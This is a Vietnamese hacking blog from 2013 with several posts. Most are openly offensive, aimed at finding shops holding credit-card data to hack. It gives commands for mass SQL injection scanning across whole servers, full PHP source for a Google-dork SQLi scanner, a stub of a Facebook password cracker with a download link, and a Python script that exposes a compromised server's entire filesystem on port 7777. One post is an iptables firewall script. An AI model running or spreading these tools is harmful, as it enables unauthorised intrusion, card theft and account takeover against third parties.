Thứ Tư, 5 tháng 6, 2013

Scan sqli all server

Đây là tool rất hay.Hãy nghĩ lúc bạn tìm đc 1 shop chắc chắc có cc .Họăc một site bạn cần phải hack.nhưng nó lại ko có lỗi.Đi check tay toàn server thì mất nhiều thời gian.Đôi khi ta bỏ.Tool này check toàn server.Nhanh gọn nhé.Hihi
lệnh
Scan 1 website:
./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt
Scan toàn bộ server

 ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt

Tải file tại đây



wget http://www.chilkatsoft.com/download/chi ... nux.tar.gz
tar xvf chilkat-9.4.0-python-2.7-i686-linux.tar.gz 
mv usr/local/lib/python2.7/site-packages/* /usr/local/lib/python2.7/dist-packages

Cài thư viện nếu thiếu nè.
Có thể dùng uniscan cũng oki 
./uniscan.pl -i "ip:xxx.xxx.xxx.xxx" 
đây là scan toàn bộ server

scan 1 site thì ./uniscan.pl -u "http://site.com/" -b -q -d -w

scan theo file list site thì ./uniscan.pl -f site.txt -bqdw

Thứ Ba, 4 tháng 6, 2013

code php scan sqli của darkzone

Code php scan sqli của darkzone.

<html>
<head>
<title>SQLi Scan - Dark Zone</title>

<!--
****************************************************************
*           SQLi Scanner by DarKmindz @ 31337 ZoNe             *
*                                                               *
* Fuck You n00b & Shit Talker & Time Wasters & Scriptkiddiots! *
****************************************************************

Written by DarKmindz @ 31337 ZoNe

Yuck Fou,
./DarkMindz & 
-->

<style>
body{
background: black;
color: red;
font-family: monospace;
font-size: 12px;
}

input{
background: black;
border: 1px solid red;
color: red;
}

h2{
color: red;
}

a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
a:hover{ color: #00FF00; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }

</style>

</head>
<body>

<?php
echo "<center>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
echo "<input type='submit' value=' Fvck It! '>";
echo "<hr><br />";

if($_POST['dork']) {

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

$i = 0;
$a = 0;
$b = 0;

while($b <= 900) {
$a = 0;
flush(); ob_flush();
echo "Pages: [ $b ]<br />";
echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
echo "Scanning Google<br />";
flush(); ob_flush();

if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "Bisey bulunamad?<br />";
flush(); ob_flush();
break;
}

preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Loadiing…<br />";
flush(); ob_flush();
while(1) {

if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection Success !</font><br />";
} else {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not access ! </font><br />";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Bitti<br />";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}

function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOW, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}
echo "</center>";
?>

</body>
</html>






Scan pass facebook bằng từ điển ver 2.5

Vào đây tải nè! (Có bộ python, file pass và file fb.py để chạy á )

http://www20.zippyshare.com/v/36247489/file.html



#!usr/bin/python

#Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall !

#This program is for educational purposes only.

#Don't attack people facebook accounts it's illegal !


#If you want to crack into someone's account, you must have the permission of the user.


#Mauritania Attacker is not responsible.


import sys

import random

import mechanize

import cookielib

IrisT firewall ver 2 nè

#!/bin/sh
#
# ---------------------------------
# IrIsT FireWall Ver 2.0
# Licence : Linux
# ---------------------------------
#
# Title   : IrIsT Linux FireWall Ver 2.0 
# Code    : Bash 
# Author  : Sajjad13and11
# Date    : 2013 16 May
# Home    : IrIsT Security Center
#
# Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf | 
# Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz  : x3o-1337 | rEd X | No PM  | Gabby | Sukhoi Su-37
# Gr33tz  : ARTA | H-SK33PY | (^_^) | Turk Sever | Dr Koderz |
# Gr33tz  : Joker_s | Mr Zero | Smart Programmer | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#

clear 

echo "   ###   ####### #     #  "
echo "    #    #       #  #  #  "
echo "    #    #       #  #  #  "
echo "    #    #####   #  #  #  "
echo "    #    #       #  #  #  "
echo "    #    #       #  #  #  "
echo "   ###   #        ## ##   "


echo  "*****************************************************"
echo  "* IFW Firewall Dedicated Version (2)                *"
echo  "* Coded By Sajjad13and11                            *"
echo  "* IrIsT.Ir && IrIsT.Ir/en                           *"
echo  "* This script don't work on OpenVZ servers          *"
echo  "* The default rules saved in /root/iptables.def     *"
echo  "*****************************************************"

sleep 3

#
iptables-save > /root/iptables.def
MODPROBE="/sbin/modprobe"
RMMOD="/sbin/rmmod"
ARP="/usr/sbin/arp"
IRISTlim="-m limit --limit 2/s --limit-burst 8"
LOG="LOG --log-level debug --log-tcp-sequence --log-tcp-options"
LOG="$LOG --log-ip-options"
PHIGH="1024:65535"
PSSH="1000:1023"

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/ip_forward

for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $i; done

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()





Sau đó chạy nó python capuchino.py

rồi kiểm tra kết quả :victim:7777

Cách này có thể giấu đc kết quả thực hiện sym trên server